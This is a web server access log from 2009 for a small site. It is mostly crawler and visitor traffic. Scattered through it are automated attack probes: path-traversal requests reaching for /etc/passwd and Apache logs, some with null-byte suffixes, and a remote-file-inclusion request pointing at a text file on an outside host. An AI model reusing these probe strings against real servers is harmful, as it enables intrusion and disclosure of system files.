67.195.37.97 - - [30/Mar/2009:14:42:37 +0200] "GET /f-warez.html HTTP/1.0" 200 10953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:14:43:21 +0200] "GET /f-zeug.html HTTP/1.0" 200 48203 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.66.137.215 - - [30/Mar/2009:14:48:13 +0200] "GET /index.php?action=../../../../../../../../../../usr/local/apache/logs/access_log HTTP/1.1" 404 2748 "http://www.various-euro.com/index.php?action=../../../../../../../../../../usr/local/apache/logs/access_log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.71.249 - - [30/Mar/2009:14:54:00 +0200] "GET /bmpp/flyer_cut3.html HTTP/1.1" 200 13727 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.252.149.16 - - [30/Mar/2009:14:54:25 +0200] "GET /neon/girl-tv.html HTTP/1.1" 200 1717 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
67.195.37.97 - - [30/Mar/2009:15:08:29 +0200] "GET /f-doku-brau.html HTTP/1.0" 200 7152 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:15:28:23 +0200] "GET /games/virtualcop/virtualcop.swf HTTP/1.0" 200 2563562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:15:40:06 +0200] "GET /neon/code.html HTTP/1.0" 200 1109 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:15:43:31 +0200] "GET /neon/europa.html HTTP/1.0" 200 389 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [30/Mar/2009:15:59:54 +0200] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:16:11:31 +0200] "GET /euro.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:16:21:39 +0200] "GET /zampa/lybia/index.html HTTP/1.0" 200 3036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.249 - - [30/Mar/2009:16:58:12 +0200] "GET /framez-dbrau.html HTTP/1.1" 200 4313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.37.97 - - [30/Mar/2009:16:59:18 +0200] "GET /zampa HTTP/1.0" 301 375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:16:59:27 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [30/Mar/2009:17:04:30 +0200] "GET /neon/euro.html HTTP/1.0" 200 2212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:17:21:00 +0200] "GET /logs/usage_200711.html HTTP/1.0" 200 109628 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:17:23:47 +0200] "GET /zampa/lybia/index.html HTTP/1.0" 200 3036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.93.49.202 - - [30/Mar/2009:17:30:02 +0200] "GET / HTTP/1.1" 302 353 "http://delicious.com/mercurska/?page=7" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
82.93.49.202 - - [30/Mar/2009:17:30:02 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://delicious.com/mercurska/?page=7" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
82.93.49.202 - - [30/Mar/2009:17:30:02 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
82.93.49.202 - - [30/Mar/2009:17:30:02 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
82.93.49.202 - - [30/Mar/2009:17:30:02 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
82.93.49.202 - - [30/Mar/2009:17:30:02 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
82.93.49.202 - - [30/Mar/2009:17:30:02 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
82.93.49.202 - - [30/Mar/2009:17:30:33 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8"
77.222.40.177 - - [30/Mar/2009:17:44:59 +0200] "GET //?f=http://www.victor-international.com//images/text/safe1.txt??? HTTP/1.1" 200 7869 "-" "libwww-perl/5.805"
74.6.8.90 - - [30/Mar/2009:18:05:14 +0200] "GET /neon/code.html HTTP/1.0" 200 1109 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:18:12:09 +0200] "GET /schubb/schubb-1.html HTTP/1.0" 200 9070 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.249 - - [30/Mar/2009:18:19:42 +0200] "GET /neon/europa.html HTTP/1.1" 200 389 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.220.53 - - [30/Mar/2009:18:20:59 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 16133 "-" "WinHttp"
65.55.220.53 - - [30/Mar/2009:18:21:00 +0200] "GET /zampa-lovers/WASISTMI1.MPG HTTP/1.1" 200 271221 "-" "WinHttp"
209.59.213.159 - - [30/Mar/2009:18:25:09 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)"
67.195.37.97 - - [30/Mar/2009:18:27:08 +0200] "GET /f-horrorkatze.html HTTP/1.0" 200 7865 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.249 - - [30/Mar/2009:18:29:11 +0200] "GET /framez-rez.html HTTP/1.1" 200 4323 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
81.52.143.33 - - [30/Mar/2009:18:31:34 +0200] "GET /neon/girlz2.html HTTP/1.1" 200 2937 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
67.195.37.97 - - [30/Mar/2009:18:31:56 +0200] "GET /logs/ HTTP/1.0" 200 10079 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.39.216 - - [30/Mar/2009:18:32:47 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:32:47 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:32:47 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:32:48 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:33:11 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:33:11 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:33:11 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:33:11 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:34:45 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:34:45 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:34:46 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:18:34:46 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
66.249.71.249 - - [30/Mar/2009:18:46:53 +0200] "GET /neon/click.html HTTP/1.1" 200 521 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.37.97 - - [30/Mar/2009:18:53:14 +0200] "GET /schubb/schubb-1.html HTTP/1.0" 200 9070 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.66.137.215 - - [30/Mar/2009:19:01:13 +0200] "GET /index.php?aux_page=../../../../../etc/passwd HTTP/1.1" 404 2748 "http://www.various-euro.com/index.php?aux_page=../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.37.97 - - [30/Mar/2009:19:11:24 +0200] "GET /zampa HTTP/1.0" 301 375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:19:11:34 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.66.137.215 - - [30/Mar/2009:19:32:48 +0200] "GET http://www.various-euro.com/cgi-bin/subscribe/subscribe.pl? HTTP/1.0" 404 2748 "http://www.various-euro.com/cgi-bin/subscribe/subscribe.pl?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.37.91 - - [30/Mar/2009:19:36:18 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.91 - - [30/Mar/2009:19:36:18 +0200] "GET /zampa HTTP/1.0" 301 375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.91 - - [30/Mar/2009:19:36:28 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.52.143.16 - - [30/Mar/2009:19:43:49 +0200] "GET /bmpp/18_x.html HTTP/1.1" 200 1100 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
66.249.71.249 - - [30/Mar/2009:19:56:45 +0200] "GET /bmpp/18_x.html HTTP/1.1" 200 1100 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.66.137.215 - - [30/Mar/2009:19:59:03 +0200] "POST http://www.various-euro.com/cgi-bin/smpro/subscribe.pl HTTP/1.0" 404 2748 "http://www.various-euro.com/cgi-bin/smpro/subscribe.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [30/Mar/2009:20:08:38 +0200] "GET /phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd HTTP/1.1" 404 2748 "http://www.various-euro.com/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.8.90 - - [30/Mar/2009:20:24:21 +0200] "GET /f-search.html HTTP/1.0" 200 11800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [30/Mar/2009:21:00:33 +0200] "GET /warez.html HTTP/1.0" 200 9754 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [30/Mar/2009:21:04:36 +0200] "GET /neon/channel.html HTTP/1.0" 200 1942 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.97 - - [30/Mar/2009:21:05:55 +0200] "GET /f-zeug.html HTTP/1.0" 200 48203 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.161 - - [30/Mar/2009:21:10:08 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.161 - - [30/Mar/2009:21:10:09 +0200] "GET /logs/usage_200709.html HTTP/1.1" 200 110974 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.71.249 - - [30/Mar/2009:21:45:25 +0200] "GET /3dsf3/sendi/communication.html HTTP/1.1" 200 1331 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.66.137.215 - - [30/Mar/2009:21:52:28 +0200] "GET http://www.various-euro.com/include/help/index.php?help_file=../../../../../../etc/passwd HTTP/1.0" 404 2748 "http://www.various-euro.com/include/help/index.php?help_file=../../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [30/Mar/2009:21:52:28 +0200] "GET http://www.various-euro.com/locales.php?next=1&srclang=../../../../../../../var/log/apache2/error_log%00%22 HTTP/1.0" 404 2748 "http://www.various-euro.com/locales.php?next=1&srclang=../../../../../../../var/log/apache2/error_log%00%22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.71.15 - - [30/Mar/2009:22:47:31 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.249 - - [30/Mar/2009:22:47:32 +0200] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.15 - - [30/Mar/2009:22:47:32 +0200] "GET / HTTP/1.1" 302 353 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.249 - - [30/Mar/2009:22:47:32 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.249 - - [30/Mar/2009:22:47:32 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.39.216 - - [30/Mar/2009:22:48:27 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:22:48:27 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:22:48:32 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [30/Mar/2009:22:48:32 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
74.6.8.90 - - [30/Mar/2009:23:32:51 +0200] "GET /net.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.66.137.215 - - [30/Mar/2009:23:36:37 +0200] "GET / HTTP/1.1" 200 7869 "http://www.various-euro.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [30/Mar/2009:23:42:17 +0200] "GET http://www.various-euro.com/detail.php?template=../../../../../../etc/passwd%00 HTTP/1.0" 404 2748 "http://www.various-euro.com/detail.php?template=../../../../../../etc/passwd%00" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [30/Mar/2009:23:42:17 +0200] "GET http://www.various-euro.com/phpPgAdmin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.0" 404 2748 "http://www.various-euro.com/phpPgAdmin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [30/Mar/2009:23:42:17 +0200] "GET http://www.various-euro.com/cgi-bin/gbrowse?help=../../../../../../../../etc/passwd%00 HTTP/1.0" 404 2748 "http://www.various-euro.com/cgi-bin/gbrowse?help=../../../../../../../../etc/passwd%00" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [30/Mar/2009:23:42:17 +0200] "GET http://www.various-euro.com/includefile.php?page=athos&page_file=../../../../../../etc/passwd HTTP/1.0" 404 2748 "http://www.various-euro.com/includefile.php?page=athos&page_file=../../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [30/Mar/2009:23:42:17 +0200] "GET http://www.various-euro.com/affiliates/index.php?md=../../../../../../../etc/passwd%00 HTTP/1.0" 404 2748 "http://www.various-euro.com/affiliates/index.php?md=../../../../../../../etc/passwd%00" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.8.90 - - [31/Mar/2009:00:00:28 +0200] "GET /logs/usage_200508.html HTTP/1.0" 200 109784 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.160 - - [31/Mar/2009:01:33:07 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.160 - - [31/Mar/2009:01:33:08 +0200] "GET /zampa/montenegro/dajpare.html HTTP/1.0" 200 2503 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:01:41:47 +0200] "GET /games/virtualcop/virtualcop.swf HTTP/1.0" 200 2563562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.235.124.61 - - [31/Mar/2009:01:45:49 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.61 - - [31/Mar/2009:01:46:04 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.61 - - [31/Mar/2009:01:46:05 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.61 - - [31/Mar/2009:01:46:05 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.61 - - [31/Mar/2009:01:46:05 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.61 - - [31/Mar/2009:01:49:31 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.61 - - [31/Mar/2009:01:49:31 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.61 - - [31/Mar/2009:01:49:31 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5418 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
81.52.143.37 - - [31/Mar/2009:02:15:51 +0200] "GET /warez.html HTTP/1.1" 200 9754 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
67.195.37.160 - - [31/Mar/2009:02:22:35 +0200] "GET /games/virtualcop/virtualcop.swf HTTP/1.0" 200 2563562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.189.172.75 - - [31/Mar/2009:02:54:06 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.google.com/search?hl=en&q=mala+pa+oce+kurac&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:07 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:07 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:07 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/frame-menu.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:07 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:07 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:10 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:11 +0200] "GET /zampa-lovers/DRAGAN_Z.JPG HTTP/1.1" 200 6850 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:13 +0200] "GET /zampa-lovers/ZAMPAMA2.MPG HTTP/1.1" 200 63492 "-" "Windows-Media-Player/9.00.00.3250"
94.189.172.75 - - [31/Mar/2009:02:54:13 +0200] "GET /zampa-lovers/WASISTMI1.MPG HTTP/1.1" 200 271221 "-" "Windows-Media-Player/9.00.00.3250"
94.189.172.75 - - [31/Mar/2009:02:54:17 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.google.com/search?hl=en&q=mala+pa+oce+kurac&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:17 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:17 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:18 +0200] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:17 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:19 +0200] "GET /zampa-lovers/ZAMPAMA2.MPG HTTP/1.1" 200 63492 "-" "Windows-Media-Player/9.00.00.3250"
94.189.172.75 - - [31/Mar/2009:02:54:20 +0200] "GET /zampa-lovers/WASISTMI1.MPG HTTP/1.1" 200 271221 "-" "Windows-Media-Player/9.00.00.3250"
94.189.172.75 - - [31/Mar/2009:02:54:21 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "-" "Windows-Media-Player/9.00.00.3250"
94.189.172.75 - - [31/Mar/2009:02:54:18 +0200] "GET /zampa-lovers/zampa.gif HTTP/1.1" 200 460627 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:23 +0200] "GET /zampa-lovers/ZAMPAMA2.MPG HTTP/1.1" 206 60915 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:37 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 206 517622 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.189.172.75 - - [31/Mar/2009:02:54:37 +0200] "GET /zampa-lovers/WASISTMI1.MPG HTTP/1.1" 206 268647 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.55.211.162 - - [31/Mar/2009:03:10:29 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
